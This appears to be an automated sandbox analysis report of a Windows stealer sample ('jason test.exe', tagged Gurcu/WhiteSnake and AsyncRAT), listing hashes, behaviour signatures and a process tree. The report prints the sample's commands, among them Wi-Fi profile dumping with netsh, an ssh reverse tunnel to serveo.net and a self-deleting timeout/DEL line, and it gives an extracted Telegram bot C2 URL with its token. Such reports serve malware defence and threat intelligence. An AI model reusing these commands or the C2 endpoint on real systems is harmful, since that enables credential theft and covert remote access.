Analysis

  • max time kernel
    30s
  • max time network
    31s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    16-08-2024 13:41

General

  • Target

    jason test.exe

  • Size

    529KB

  • MD5

    56acec58d46d6f079c16209f4347360a

  • SHA1

    a7587f272a6afc0751ead66478d9a00742ce007e

  • SHA256

    0ebe58286c1f137fa8502c2b9e6f0e60b451409a3caac4125ef0ea10c931024d

  • SHA512

    724b8f625045c27fb6df5a29dda9ff889865349661c6d810b858b97f4ef33ff6a5bee30f5c61d73a304694589c937450dae7d98275fe1642001bb42b79050216

  • SSDEEP

    6144:qbioob8+F2a9boZguBQNYPj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZ+V:Nd8xZguBiYPAq81g5aN+BVKD

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7375395402:AAEj5wSTewdwdI2lrdXYvNdlkLxj5pTH9pg/sendMessage?chat_id=6725988743

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Async RAT payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, the web browser credential store.

  • Executes dropped EXE 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies, and similar artifacts.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerates installed browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 25 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\jason test.exe
    "C:\Users\Admin\AppData\Local\Temp\jason test.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:492
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /C wmic path win32_ComputerSystem get model
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:968
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_ComputerSystem get model
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4364
    • C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe
      "C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe"
      2⤵
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4732
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        3⤵
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:3216
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
          PID:3820
        • C:\Windows\system32\netsh.exe
          netsh wlan show profiles
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:2732
        • C:\Windows\system32\findstr.exe
          findstr /R /C:"[ ]:[ ]"
          4⤵
          PID:2120
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:72
        • C:\Windows\system32\chcp.com
          chcp 65001
          4⤵
          PID:1952
        • C:\Windows\system32\netsh.exe
          netsh wlan show networks mode=bssid
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:3036
        • C:\Windows\system32\findstr.exe
          findstr "SSID BSSID Signal"
          4⤵
          PID:4760
      • C:\Windows\System32\OpenSSH\ssh.exe
        "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3724 serveo.net
        3⤵
        PID:3192
    • C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe
      "C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:448
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C TIMEOUT /T 3 && DEL /f "C:\Users\Admin\AppData\Local\Temp\jason test.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Windows\system32\timeout.exe
        TIMEOUT /T 3
        3⤵
        • Delays execution with timeout.exe
        PID:2804
  • C:\Windows\System32\Taskmgr.exe
    "C:\Windows\System32\Taskmgr.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4728

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\cRWlRBoVEkJF\Latypuh_LetThereBeCarnage.exe

    Filesize

    405KB

    MD5

    9bed44cbd66a6ac9ba58bd121cc31120

    SHA1

    ec7479fcf0b9574bbcd155cba27bcd3b73d2a80d

    SHA256

    488e8ae508c7fab6587ec3e5640e9edb61c397667dc5e799322bb76d8ffc3a02

    SHA512

    f639c53e6b24f7afb0a24172f4ea7f5a453d5d123ea35340533ad3476efb8cb7b510cf22eb75bb47f06e830b0fa9250ee10df7cab93a4f37bd676b1ada3678b8

  • C:\Users\Admin\AppData\Local\Temp\nZLDYKrFaM\build.exe

    Filesize

    115KB

    MD5

    6cba0a7c6d100f3e95efbeb4c14880ce

    SHA1

    11b39ee1e96aba2a001f5a74ff4dcf2749e6bdbe

    SHA256

    8eb6369c9fa16e155ca29cedff0fd812ccb1d0ba9c0a3af912744a2e7e7167c3

    SHA512

    e3e57ce5dacd83677d4b0c5824adb130123708c2ecc06d7d3e9e8be99ac00a542451b932f631e67dcfa2f8805369da5b95883c62f50b88dcd2471ed6432ca3f8

  • memory/448-26-0x0000000000490000-0x00000000004FC000-memory.dmp

    Filesize

    432KB

  • memory/492-0-0x00007FFFB7B33000-0x00007FFFB7B35000-memory.dmp

    Filesize

    8KB

  • memory/492-1-0x0000000000110000-0x000000000019A000-memory.dmp

    Filesize

    552KB

  • memory/4728-42-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-44-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-43-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-48-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-54-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-53-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-52-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-51-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-50-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4728-49-0x000001E0F6AC0000-0x000001E0F6AC1000-memory.dmp

    Filesize

    4KB

  • memory/4732-27-0x000002D6E3570000-0x000002D6E3592000-memory.dmp

    Filesize

    136KB